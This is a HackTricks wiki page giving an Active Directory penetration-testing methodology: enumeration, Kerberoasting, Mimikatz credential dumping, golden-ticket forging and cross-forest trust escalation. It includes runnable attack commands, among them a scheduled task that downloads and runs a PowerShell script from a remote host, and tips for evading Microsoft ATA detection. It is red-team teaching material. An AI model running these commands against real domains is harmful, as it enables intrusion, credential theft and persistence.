📔
HackTricks - Boitatech
  • HackTricks
  • About the author
  • Getting Started in Hacking
  • Pentesting Methodology
  • External Recon Methodology
    • Github Leaked Secrets
  • Phishing Methodology
    • Clone a Website
    • Detecting Phising
    • Phishing Documents
  • Exfiltration
  • Tunneling and Port Forwarding
  • Brute Force - CheatSheet
  • Search Exploits
  • Shells
    • Shells (Linux, Windows, MSFVenom)
      • MSFVenom - CheatSheet
      • Shells - Windows
      • Shells - Linux
      • Full TTYs
  • Linux/Unix
    • Checklist - Linux Privilege Escalation
    • Linux Privilege Escalation
      • PAM - Pluggable Authentication Modules
      • SELinux
      • Logstash
      • AppArmor
      • Containerd (ctr) Privilege Escalation
      • Docker Breakout
      • electron/CEF/chromium debugger abuse
      • Escaping from Jails
      • Cisco - vmanage
      • D-Bus Enumeration & Command Injection Privilege Escalation
      • Interesting Groups - Linux PE
        • lxd/lxc Group - Privilege escalation
      • ld.so exploit example
      • Linux Capabilities
      • NFS no_root_squash/no_all_squash misconfiguration PE
      • Payloads to execute
      • RunC Privilege Escalation
      • Seccomp
      • Splunk LPE and Persistence
      • SSH Forward Agent exploitation
      • Socket Command Injection
      • Wildcards Spare tricks
    • Useful Linux Commands
      • Bypass Bash Restrictions
    • Linux Environment Variables
  • MacOS
    • MacOS Security & Privilege Escalation
      • Mac OS Architecture
      • MacOS MDM
        • Enrolling Devices in Other Organisations
      • MacOS Protocols
      • MacOS Red Teaming
      • MacOS Serial Number
      • MacOS Apps - Inspecting, debugging and Fuzzing
  • Windows
    • Checklist - Local Windows Privilege Escalation
    • Windows Local Privilege Escalation
      • AppendData/AddSubdirectory permission over service registry
      • Create MSI with WIX
      • DPAPI - Extracting Passwords
      • SeImpersonate from High To System
      • Access Tokens
      • ACLs - DACLs/SACLs/ACEs
      • Dll Hijacking
      • From High Integrity to SYSTEM with Name Pipes
      • Integrity Levels
      • JAWS
      • JuicyPotato
      • Leaked Handle Exploitation
      • MSI Wrapper
      • Named Pipe Client Impersonation
      • PowerUp
      • Privilege Escalation Abusing Tokens
      • Privilege Escalation with Autoruns
      • RottenPotato
      • Seatbelt
      • SeDebug + SeImpersonate copy token
      • Windows C Payloads
    • Active Directory Methodology
      • Abusing Active Directory ACLs/ACEs
      • AD information in printers
      • ASREPRoast
      • BloodHound
      • Constrained Delegation
      • Custom SSP
      • DCShadow
      • DCSync
      • DSRM Credentials
      • Golden Ticket
      • Kerberos Authentication
      • Kerberoast
      • MSSQL Trusted Links
      • Over Pass the Hash/Pass the Key
      • Pass the Ticket
      • Password Spraying
      • Force NTLM Privileged Authentication
      • Privileged Accounts and Token Privileges
      • Resource-based Constrained Delegation
      • Security Descriptors
      • Silver Ticket
      • Skeleton Key
      • Unconstrained Delegation
    • NTLM
      • Places to steal NTLM creds
      • PsExec/Winexec/ScExec
      • SmbExec/ScExec
      • WmicExec
      • AtExec / SchtasksExec
      • WinRM
    • Stealing Credentials
      • Credentials Protections
      • Mimikatz
    • Authentication, Credentials, UAC and EFS
    • Basic CMD for Pentesters
    • Basic PowerShell for Pentesters
      • PowerView
    • AV Bypass
  • Mobile Apps Pentesting
    • Android APK Checklist
    • Android Applications Pentesting
      • Android Applications Basics
      • Android Task Hijacking
      • ADB Commands
      • APK decompilers
      • AVD - Android Virtual Device
      • Burp Suite Configuration for Android
      • content:// protocol
      • Drozer Tutorial
        • Exploiting Content Providers
      • Exploiting a debuggeable applciation
      • Frida Tutorial
        • Frida Tutorial 1
        • Frida Tutorial 2
        • Frida Tutorial 3
        • Objection Tutorial
      • Google CTF 2018 - Shall We Play a Game?
      • Inspeckage Tutorial
      • Intent Injection
      • Make APK Accept CA Certificate
      • Manual DeObfuscation
      • React Native Application
      • Reversing Native Libraries
      • Smali - Decompiling/[Modifying]/Compiling
      • Spoofing your location in Play Store
      • Webview Attacks
    • iOS Pentesting Checklist
    • iOS Pentesting
      • Basic iOS Testing Operations
      • Burp Suite Configuration for iOS
      • Extracting Entitlements From Compiled Application
      • Frida Configuration in iOS
      • iOS App Extensions
      • iOS Basics
      • iOS Custom URI Handlers / Deeplinks / Custom Schemes
      • iOS Hooking With Objection
      • iOS Protocol Handlers
      • iOS Serialisation and Encoding
      • iOS Testing Environment
      • iOS UIActivity Sharing
      • iOS Universal Links
      • iOS UIPasteboard
      • iOS WebViews
  • Pentesting
    • Pentesting Network
      • Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
      • Spoofing SSDP and UPnP Devices with EvilSSDP
      • Wifi Attacks
        • Evil Twin EAP-TLS
      • Pentesting IPv6
      • Nmap Summary (ESP)
      • Network Protocols Explained (ESP)
      • IDS and IPS Evasion
      • DHCPv6
    • Pentesting JDWP - Java Debug Wire Protocol
    • Pentesting Printers
      • Accounting bypass
      • Buffer Overflows
      • Credentials Disclosure / Brute-Force
      • Cross-Site Printing
      • Document Processing
      • Factory Defaults
      • File system access
      • Firmware updates
      • Memory Access
      • Physical Damage
      • Software packages
      • Transmission channel
      • Print job manipulation
      • Print Job Retention
      • Scanner and Fax
    • Pentesting SAP
    • Pentesting Kubernetes
      • Enumeration from a Pod
      • Hardening Roles/ClusterRoles
      • Pentesting Kubernetes from the outside
    • 7/tcp/udp - Pentesting Echo
    • 21 - Pentesting FTP
      • FTP Bounce attack - Scan
      • FTP Bounce - Download 2ºFTP file
    • 22 - Pentesting SSH/SFTP
    • 23 - Pentesting Telnet
    • 25,465,587 - Pentesting SMTP/s
      • SMTP - Commands
    • 43 - Pentesting WHOIS
    • 53 - Pentesting DNS
    • 69/UDP TFTP/Bittorrent-tracker
    • 79 - Pentesting Finger
    • 80,443 - Pentesting Web Methodology
      • 403 & 401 Bypasses
      • AEM - Adobe Experience Cloud
      • Apache
      • Artifactory Hacking guide
      • Buckets
        • Firebase Database
        • AWS-S3
      • CGI
      • Code Review Tools
      • Drupal
      • Flask
      • Git
      • Golang
      • GraphQL
      • H2 - Java SQL database
      • IIS - Internet Information Services
      • JBOSS
      • Jenkins
      • JIRA
      • Joomla
      • JSP
      • Laravel
      • Moodle
      • Nginx
      • PHP Tricks (SPA)
        • PHP - Useful Functions & disable_functions/open_basedir bypass
          • disable_functions bypass - php-fpm/FastCGI
          • disable_functions bypass - dl function
          • disable_functions bypass - PHP 7.0-7.4 (*nix only)
          • disable_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit
          • disable_functions - PHP 5.x Shellshock Exploit
          • disable_functions - PHP 5.2.4 ionCube extension Exploit
          • disable_functions bypass - PHP <= 5.2.9 on windows
          • disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
          • disable_functions bypass - PHP safe_mode bypass via proc_open() and custom environment Exploit
          • disable_functions bypass - PHP Perl Extension Safe_mode Bypass Exploit
          • disable_functions bypass - PHP 5.2.3 - Win32std ext Protections Bypass
          • disable_functions bypass - PHP 5.2 - FOpen Exploit
          • disable_functions bypass - via mem
          • disable_functions bypass - mod_cgi
          • disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec
      • Python
      • Special HTTP headers
      • Spring Actuators
      • Symphony
      • Tomcat
      • Uncovering CloudFlare
      • VMWare (ESX, VCenter...)
      • Web API Pentesting
      • WebDav
      • werkzeug
      • Wordpress
      • XSS to RCE Electron Desktop Apps
    • 88tcp/udp - Pentesting Kerberos
      • Harvesting tickets from Windows
      • Harvesting tickets from Linux
    • 110,995 - Pentesting POP
    • 111/TCP/UDP - Pentesting Portmapper
    • 113 - Pentesting Ident
    • 123/udp - Pentesting NTP
    • 135, 593 - Pentesting MSRPC
    • 137,138,139 - Pentesting NetBios
    • 139,445 - Pentesting SMB
    • 143,993 - Pentesting IMAP
    • 161,162,10161,10162/udp - Pentesting SNMP
      • SNMP RCE
    • 194,6667,6660-7000 - Pentesting IRC
    • 264 - Pentesting Check Point FireWall-1
    • 389, 636, 3268, 3269 - Pentesting LDAP
    • 500/udp - Pentesting IPsec/IKE VPN
    • 502 - Pentesting Modbus
    • 512 - Pentesting Rexec
    • 513 - Pentesting Rlogin
    • 514 - Pentesting Rsh
    • 515 - Pentesting Line Printer Daemon (LPD)
    • 548 - Pentesting Apple Filing Protocol (AFP)
    • 554,8554 - Pentesting RTSP
    • 623/UDP/TCP - IPMI
    • 631 - Internet Printing Protocol(IPP)
    • 873 - Pentesting Rsync
    • 1026 - Pentesting Rusersd
    • 1080 - Pentesting Socks
    • 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
    • 1433 - Pentesting MSSQL - Microsoft SQL Server
    • 1521,1522-1529 - Pentesting Oracle TNS Listener
      • Oracle Pentesting requirements installation
      • TNS Poison
      • Remote stealth pass brute force
      • Oracle RCE & more
    • 1723 - Pentesting PPTP
    • 1883 - Pentesting MQTT (Mosquitto)
    • 2049 - Pentesting NFS Service
    • 2301,2381 - Pentesting Compaq/HP Insight Manager
    • 2375, 2376 Pentesting Docker
    • 3128 - Pentesting Squid
    • 3260 - Pentesting ISCSI
    • 3299 - Pentesting SAPRouter
    • 3306 - Pentesting Mysql
    • 3389 - Pentesting RDP
    • 3632 - Pentesting distcc
    • 3690 - Pentesting Subversion (svn server)
    • 4369 - Pentesting Erlang Port Mapper Daemon (epmd)
    • 5000 - Pentesting Docker Registry
    • 5353/UDP Multicast DNS (mDNS)
    • 5432,5433 - Pentesting Postgresql
    • 5601 - Pentesting Kibana
    • 5671,5672 - Pentesting AMQP
    • 5800,5801,5900,5901 - Pentesting VNC
    • 5984,6984 - Pentesting CouchDB
    • 5985,5986 - Pentesting WinRM
    • 6000 - Pentesting X11
    • 6379 - Pentesting Redis
    • 8009 - Pentesting Apache JServ Protocol (AJP)
    • 8089 - Splunkd
    • 9000 - Pentesting FastCGI
    • 9001 - Pentesting HSQLDB
    • 9042/9160 - Pentesting Cassandra
    • 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream)
    • 9200 - Pentesting Elasticsearch
    • 10000 - Pentesting Network Data Management Protocol (ndmp)
    • 11211 - Pentesting Memcache
    • 15672 - Pentesting RabbitMQ Management
    • 27017,27018 - Pentesting MongoDB
    • 44818/UDP/TCP - Pentesting EthernetIP
    • 47808/udp - Pentesting BACNet
    • 50030,50060,50070,50075,50090 - Pentesting Hadoop
  • Pentesting Web
    • Web Vulnerabilities Methodology
    • Reflecting Techniques - PoCs and Polygloths CheatSheet
      • Web Vulns List
    • 2FA/OTP Bypass
    • Abusing hop-by-hop headers
    • Bypass Payment Process
    • Captcha Bypass
    • Cache Poisoning and Cache Deception
    • Clickjacking
    • Client Side Template Injection (CSTI)
    • Command Injection
    • Content Security Policy (CSP) Bypass
    • Cookies Hacking
    • CORS - Misconfigurations & Bypass
    • CRLF (%0D%0A) Injection
    • Cross-site WebSocket hijacking (CSWSH)
    • CSRF (Cross Site Request Forgery)
    • Dangling Markup - HTML scriptless injection
    • Deserialization
      • NodeJS - __proto__ & prototype Pollution
      • Java JSF ViewState (.faces) Deserialization
      • Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
      • Basic Java Deserialization (ObjectInputStream, readObject)
      • CommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep
      • Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
      • Exploiting __VIEWSTATE knowing the secrets
      • Exploiting __VIEWSTATE without knowing the secrets
    • Domain/Subdomain takeover
    • Email Header Injection
    • File Inclusion/Path traversal
      • phar:// deserialization
    • File Upload
      • PDF Upload - XXE and CORS bypass
    • Formula Injection
    • HTTP Request Smuggling / HTTP Desync Attack
    • H2C Smuggling
    • IDOR
    • JWT Vulnerabilities (Json Web Tokens)
    • NoSQL injection
    • LDAP Injection
    • Login Bypass
      • Login bypass List
    • OAuth to Account takeover
    • Open Redirect
    • Parameter Pollution
    • PostMessage Vulnerabilities
    • Race Condition
    • Rate Limit Bypass
    • Registration Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Attacks
      • SAML Basics
    • Server Side Inclusion/Edge Side Inclusion Injection
    • SQL Injection
      • MSSQL Injection
      • Oracle injection
      • PostgreSQL injection
        • dblink/lo_import data exfiltration
        • PL/pgSQL Password Bruteforce
        • Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
        • Big Binary Files Upload (PostgreSQL)
        • RCE with PostgreSQL Extensions
      • MySQL injection
        • Mysql SSRF
      • SQLMap - Cheetsheat
        • Second Order Injection - SQLMap
    • SSRF (Server Side Request Forgery)
    • SSTI (Server Side Template Injection)
      • EL - Expression Language
    • Reverse Tab Nabbing
    • Unicode Normalization vulnerability
    • Web Tool - WFuzz
    • XPATH injection
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • XXE - XEE - XML External Entity
    • XSS (Cross Site Scripting)
      • PDF Injection
      • DOM XSS
      • Server Side XSS (Dynamic PDF)
      • XSS Tools
    • XSSI (Cross-Site Script Inclusion)
    • XS-Search
  • Forensics
    • Basic Forensic Methodology
      • Baseline Monitoring
      • Anti-Forensic Techniques
      • Docker Forensics
      • Image Adquisition & Mount
      • Linux Forensics
      • Malware Analysis
      • Memory dump analysis
        • Volatility - CheatSheet
      • Partitions/File Systems/Carving
        • EXT
        • File/Data Carving & Recovery Tools
        • NTFS
      • Pcap Inspection
        • DNSCat pcap analysis
        • USB Keystrokes
        • Wifi Pcap Analysis
        • Wireshark tricks
      • Specific Software/File-Type Tricks
        • .pyc
        • Browser Artifacts
        • Desofuscation vbs (cscript.exe)
        • Local Cloud Storage
        • Office file analysis
        • PDF File analysis
        • PNG tricks
        • Video and Audio file analysis
        • ZIPs tricks
      • Windows Artifacts
        • Windows Processes
        • Interesting Windows Registry Keys
  • A.I. Exploiting
    • BRA.I.NSMASHER Presentation
      • Basic Bruteforcer
      • Basic Captcha Breaker
      • BIM Bruteforcer
      • Hybrid Malware Classifier Part 1
  • Blockchain
    • Blockchain & Crypto Currencies
  • Courses and Certifications Reviews
    • INE Courses and eLearnSecurity Certifications Reviews
  • Cloud Security
    • Cloud security review
    • AWS Security
  • Physical attacks
    • Physical Attacks
    • Escaping from KIOSKs
      • Show file extensions
  • Reversing
    • Reversing Tools & Basic Methods
      • Angr
        • Angr - Examples
      • Z3 - Satisfiability Modulo Theories (SMT)
      • Cheat Engine
      • Blobrunner
    • Common API used in Malware
    • Cryptographic/Compression Algorithms
      • Unpacking binaries
    • Word Macros
  • Exploiting
    • Linux Exploiting (Basic) (SPA)
      • Format Strings Template
      • ROP - call sys_execve
      • ROP - Leaking LIBC address
        • ROP - Leaking LIBC template
      • Bypassing Canary & PIE
      • Ret2Lib
      • Fusion
    • Exploiting Tools
      • PwnTools
    • Windows Exploiting (Basic Guide - OSCP lvl)
  • Cryptography
    • Certificates
    • Cipher Block Chaining CBC-MAC
    • Crypto CTFs Tricks
    • Electronic Code Book (ECB)
    • Hash Length Extension Attack
    • Padding Oracle
    • RC4 - Encrypt&Decrypt
  • BACKDOORS
    • Merlin
    • Empire
    • Salseo
    • ICMPsh
  • Stego
    • Stego Tricks
    • Esoteric languages
  • MISC
    • Basic Python
      • venv
      • Bypass Python sandboxes
      • Magic Methods
      • Web Requests
      • Bruteforce hash (few chars)
    • Other Big References
  • TODO
    • More Tools
    • MISC
    • Pentesting DNS
  • Burp Suite
  • Other Web Tricks
  • Interesting HTTP
  • Emails Vulnerabilities
  • Android Forensics
  • TR-069
  • 6881/udp - Pentesting BitTorrent
  • CTF Write-ups
    • challenge-0521.intigriti.io
    • Try Hack Me
      • hc0n Christmas CTF - 2019
      • Pickle Rick
  • 1911 - Pentesting fox
  • Online Platforms with API
  • Stealing Sensitive Information Disclosure from a Web
  • Post Exploitation
Powered by GitBook
On this page
  • Basic overview
  • Kerberos Authentication
  • Cheat Sheet
  • Recon Active Directory (No creds/sessions)
  • User enumeration
  • Knowing one or several usernames
  • Enumerating Active Directory (Some creds/Session)
  • Enumeration
  • Kerberoast
  • Local Privilege Escalation
  • Win-RM
  • Privesc on Active Directory (Some "privileged" Creds/Session)
  • Hash extraction
  • Pass the Hash
  • Over Pass the Hash/Pass the Key
  • Pass the Ticket
  • MSSQL Trusted Links
  • Unconstrained Delegation
  • Constrained Delegation
  • ACLs Abuse
  • Printer Spooler service abuse
  • Dumping Domain Credentials
  • Persistence
  • Golden Ticket
  • Silver Ticket
  • AdminSDHolder Group
  • DSRM Credentials
  • ACL Persistence
  • Security Descriptors
  • Skeleton Key
  • Custom SSP
  • DCShadow
  • Forest Privilege Escalation - Domain Trusts
  • Basic Information
  • Different trusts
  • Attack Path
  • Child-to-Parent forest privilege escalation
  • External Forest Domain Privilege escalation
  • Domain trust abuse mitigation
  • Some General Defenses
  • Deception
  • How to identify deception
  • Bypassing Microsoft ATA detection
  • More Tools

Was this helpful?

  1. Windows

Active Directory Methodology

PreviousWindows C PayloadsNextAbusing Active Directory ACLs/ACEs

Last updated 3 years ago

Was this helpful?

Do you use Hacktricks every day? Did you find the book very useful? Would you like to receive extra help with cybersecurity questions? Would you like to find more and higher quality content on Hacktricks? so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!

If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the , or follow me on Twitter . If you want to share some tricks with the community you can also submit pull requests to that will be reflected in this book and don't forget to give ⭐ on github to motivate me to continue developing this book.

Basic overview

Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.

The Active Directory structure includes three main tiers: 1) domains, 2) trees, and 3) forests. Several objects (users or devices) that all use the same database may be grouped in to a single domain. Multiple domains can be combined into a single group called a tree. Multiple trees may be grouped into a collection called a forest. Each one of these levels can be assigned specific access rights and communication privileges.

Main concepts of an Active Directory:

  1. Directory – Contains all the information about the objects of the Active directory

  2. Object – An object references almost anything inside the directory (a user, group, shared folder...)

  3. Domain – The objects of the directory are contained inside the domain. Inside a "forest" more than one domain can exist and each of them will have their own objects collection.

  4. Tree – Group of domains with the same root. Example: dom.local, email.dom.local, www.dom.local

  5. Forest – The forest is the highest level of the organization hierarchy and is composed by a group of trees. The trees are connected by trust relationships.

Active Directory provides several different services, which fall under the umbrella of "Active Directory Domain Services," or AD DS. These services include:

  1. Domain Services – stores centralized data and manages communication between users and domains; includes login authentication and search functionality

  2. Certificate Services – creates, distributes, and manages secure certificates

  3. Lightweight Directory Services – supports directory-enabled applications using the open (LDAP) protocol

  4. Directory Federation Services – provides single-sign-on (SSO) to authenticate a user in multiple web applications in a single session

  5. Rights Management – protects copyrighted information by preventing unauthorized use and distribution of digital content

  6. DNS Service – Used to resolve domain names.

Kerberos Authentication

Cheat Sheet

Recon Active Directory (No creds/sessions)

If you just have access to an AD environment but you don't have any credentials/sessions you could:

  • Check for null and Guest access on smb services (this won't work on modern Windows versions):

    • enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

    • smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

    • smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

  • Enumerate Ldap:

    • nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

  • Poison the network

User enumeration

When an invalid username is requested the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN, allowing us to determine that the username was invalid. Valid usernames will illicit either the TGT in a AS-REP response or the error KRB5KDC_ERR_PREAUTH_REQUIRED, indicating that the user is required to perform pre-authentication.

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>
Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>
msf> use auxiliary/gather/kerberos_enumusers
./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
crackmapexec smb dominio.es  -u '' -p '' --users | awk '{print $4}' | uniq
enum4linux -U 10.10.10.161 | grep 'user:' | sed 's/user:\[//g' | sed 's/\]//g' | awk '{print $1}'

You could also use the impacket script of ASREPRoast to enumerate valid usernames.

Knowing one or several usernames

Ok, so you know you have already a valid username but no passwords...Then try:

Enumerating Active Directory (Some creds/Session)

For this phase you need to have compromised the credentials or a session of a valid domain account.

Enumeration

Having compromised an account is a big step to start compromising the whole domain, because you are going to be able to start the Active Directory Enumeration:

Even if this Enumeration section looks small this is the most important part of all. Access the links (mainly the one of cmd, powershell, powerview and BloodHound), learn how to enumerate a domain and practice until you feel comfortable. During an assessment, this will be the key moment to find your way to DA or to decide that nothing can be done.

Kerberoast

Local Privilege Escalation

Win-RM

Privesc on Active Directory (Some "privileged" Creds/Session)

For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.

Hash extraction

Pass the Hash

Over Pass the Hash/Pass the Key

Pass the Ticket

MSSQL Trusted Links

Unconstrained Delegation

Constrained Delegation

ACLs Abuse

Printer Spooler service abuse

Dumping Domain Credentials

Once you get Domain Admin privileges, you can dump all the domain database.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Persistence

Golden Ticket

A valid TGT as any user can be created using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of TGS is being able to access any service (or machine) in the domain ad the impersonated user.

Silver Ticket

AdminSDHolder Group

DSRM Credentials

ACL Persistence

Security Descriptors

Skeleton Key

Custom SSP

DCShadow

Forest Privilege Escalation - Domain Trusts

Microsoft considers that the domain isn't a Security Boundary, the Forest is the security Boundary. This means that if you compromise a domain inside a Forest you are going to be able to compromise the entire Forest.

Basic Information

Essentially, all a trust does is linking up the authentication systems of two domains and allowing authentication traffic to flow between them through a system of referrals. When 2 domains trust each other they exchange keys, these keys are going to be saved in the DCs of each domains (1 key per trust direction) and the keys will be the base of the trust.

When a user tries to access a service on the trusting domain it will request an inter-realm TGT to the DC of its domain. The DC wills serve the client this TGT which would be encrypted/signed with the inter-realm key (the key both domains exchanged). Then, the client will access the DC of the other domain and will request a TGS for the service using the inter-realm TGT. The DC of the trusting domain will check the key used, if it's ok, it will trust everything in that ticket and will serve the TGS to the client.

Different trusts

It's important to notice that a trust can be 1 way or 2 ways. In the 2 ways options, both domains will trust each other, but in the 1 way trust relation one of the domains will be the trusted and the other the trusting domain. In the last case, you will only be able to access resources inside the trusting domain from the trusted one.

A trust relationship can also be transitive (A trust B, B trust C, then A trust C) or non-transitive.

Different trusting relationships:

  • Parent/Child – part of the same forest – a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that you’ll encounter.

  • Cross-link – aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.

  • Forest – a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering.

Attack Path

  1. Enumerate the trusting relationships

  2. Check if any security principal (user/group/computer) has access to resources of the other domain, maybe by ACE entries or by being in groups of the other domain. Look for relationships across domains (the trust was created for this probably).

    1. kerberoast in this case could be another option.

  3. Compromise the accounts which can pivot through domains.

There are three main ways that security principals (users/groups/computer) from one domain can have access into resources in another foreign/trusting domain:

  • They can be added to local groups on individual machines, i.e. the local “Administrators” group on a server.

  • They can be added to groups in the foreign domain. There are some caveats depending on trust type and group scope, described shortly.

Child-to-Parent forest privilege escalation

Also, notice that there are 2 trusted keys, one for Child --> Parent and another one for Parent --> Child.

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:7ef5be456dc8d7450fb8f5f7348746c5 /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
/domain:<Current domain>
/sid:<SID of current domain>
/sids:<SID of the Enterprise Admins group of the parent domain>
/rc4:<Trusted key>
/user:Administrator
/service:<target service>
/target:<Other domain>
/ticket:C:\path\save\ticket.kirbi

For finding the SID of the "Enterprise Admins" group you can find the SID of the root domain and set it in S-1-5-21root domain-519. For example, from root domain SID S-1-5-21-280534878-1496970234-700767426 the "Enterprise Admins"group SID is S-1-5-21-280534878-1496970234-700767426-519

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local 
 .\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
 ls \\mcorp-dc.moneycorp.local\c$

Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"

External Forest Domain Privilege escalation

In this case you can sign with the trusted key a TGT impersonating the Administrator user of the current domain. In this case you won't always get Domain Admins privileges in the external domain, but only the privileges the Administrator user of your current domain was given in the external domain.

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

Domain trust abuse mitigation

SID Filtering:

  • Avoid attacks which abuse SID history attribute across forest trust.

  • Enabled by default on all inter-forest trusts. Intra-forest trusts are assumed secured by default (MS considers forest and not the domain to be a security boundary).

  • But, since SID filtering has potential to break applications and user access, it is often disabled.

  • Selective Authentication

    • In an inter-forest trust, if Selective Authentication is configured, users between the trusts will not be automatically authenticated. Individual access to domains and servers in the trusting domain/forest should be given.

Some General Defenses

  • Not allow Domain Admins to login on any other hosts apart from Domain Controllers

  • Never run a service with DA privileges

  • If you need domain admin privileges, limit the time: Add-ADGroupMember -Identity ‘Domain Admins’ -Members newDA -MemberTimeToLive (New-TimeSpan -Minutes 20)

Deception

  • Password does not expire

  • Trusted for Delegation

  • Users with SPN

  • Password in description

  • Users who are members of high privilege groups

  • Users with ACL rights over other users, groups or containers

  • Computer objects

  • ...

    • Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose

How to identify deception

For user objects:

  • ObjectSID (different from the domain)

  • lastLogon, lastlogontimestamp

  • Logoncount (very low number is suspicious)

  • whenCreated

  • Badpwdcount (very low number is suspicious)

General:

  • Some solutions fill with information in all the possible attributes. For example, compare the attributes of a computer object with the attribute of a 100% real computer object like DC. Or users against the RID 500 (default admin).

  • Check if something is too good to be true

Bypassing Microsoft ATA detection

User enumeration

ATA only complains when you try to enumerate sessions in the DC, so if you don't look for sessions in the DC but in the rest of the hosts, you probably won't get detected.

Tickets impersonation creation (Over pass the hash, golden ticket...)

Always create the tickets using the aes keys also because what ATA identifies as malicious is the degradation to NTLM.

DCSync

If you don't execute this from a Domain Controller, ATA is going to catch you, sorry.

More Tools

AD DS is included with Windows Server (including Windows Server 10) and is designed to manage client systems. While systems running the regular version of Windows do not have the administrative features of AD DS, they do support Active Directory. This means any Windows computer can connect to a Windows workgroup, provided the user has the correct login credentials. From:

To learn how to attack an AD you need to understand really good the Kerberos authentication process.

You can take a lot to to have a quick view of which commands you can run to enumerate/exploit an AD.

Pentest the network: Scan the network, find machines and open ports and try to exploit vulnerabilities or extract credentials from them (for example, . Take a look to the General to find more information about how to do this.

Gather credentials

Access host by ****

Gather credentials exposing

OSINT: Try to extract possible usernames from services (mainly web) inside the domain environments and also from the publicly available web pages of the company. If you find the complete names of company workers, you could try different AD username conventions (). The most common conventions are: NameSurname, Name.Surname, NamSur (3letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N, 3 random letters and 3 random numbers (abc123). You could also try statistically most used usernames: Read the following Username enumeration section to learn how to find if a username is valid or not.

: If a user doesn't have the attribute DONT_REQ_PREAUTH you can request a AS_REP message for that user that will contain some data encrypted by a derivation of the password of the user.

: Let's try the most common passwords with each of the discovered users, maybe some user is using a bad password (keep in mind the password policy)

A final option if the accounts cannot be locked is the ****

If you have some valid credentials or a shell as a domain user, you should remember that the options given before are still options to compromise other users. Regarding you can now find every possible vulnerable user, and regarding you can get a list of all the usernames and try the password of the compromised account (if you know it). It's very easy to obtain all the domain usernames from Windows (net user /domain ,Get-DomainUseror wmic useraccount get name,sid). In* linux\* you can use: GetADUsers.py -all -dc-ip 10.10.10.110 domain.com/username

You could use some, but using will probably be stealthier, and you could even to extract more detailed information. Always learn what a CMD or powershell/powerview command does before executing it, this way you will know how stealth are you being.

Another amazing tool for recon in an active directory is . It is not very stealthy (depending on the collection methods you use), but if you don't care about that, you should totally give it a try.

If you are using Linux, you could also .

You could also try

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets are encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. You can know that a user account is being used as a service because the property "ServicePrincipalName" is not null. Find more information about this attack .

